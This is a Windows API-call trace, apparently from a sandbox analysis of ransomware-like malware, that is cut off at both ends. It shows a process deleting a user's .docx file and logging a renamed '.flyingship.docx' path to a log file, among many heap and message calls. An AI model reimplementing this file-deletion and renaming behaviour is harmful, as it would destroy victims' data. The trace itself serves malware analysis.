dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0177.503] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.504] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.504] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0177.504] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.504] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.504] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.506] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.506] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.506] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0177.506] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.506] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.506] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.507] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.507] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.507] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0177.507] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.507] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFilePart=0x0) returned 0x41 [0177.508] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xf224140, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0x90ae18 [0177.508] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\8kaz.docx")) returned 1 [0177.512] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xf224140, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0 [0177.512] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0177.512] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.513] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.513] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0177.513] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.513] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.513] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.513] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.513] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.513] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0177.514] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.515] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.515] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0177.515] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.515] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.516] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0177.516] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x16a8, lpOverlapped=0x0) returned 1 [0177.516] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0177.516] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x16a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.516] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0177.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0177.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0177.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\n", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0177.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f) returned 0x923a78 [0177.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\n", cchWideChar=79, lpMultiByteStr=0x923a78, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\n", lpUsedDefaultChar=0x0) returned 79 [0177.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0177.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0177.516] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0177.516] WriteFile (in: hFile=0x138, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4e, lpOverlapped=0x0) returned 1 [0177.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0177.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.517] CloseHandle (hObject=0x138) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0177.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0177.521] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0177.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.522] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.522] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0177.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0177.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0177.523] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0177.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0177.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 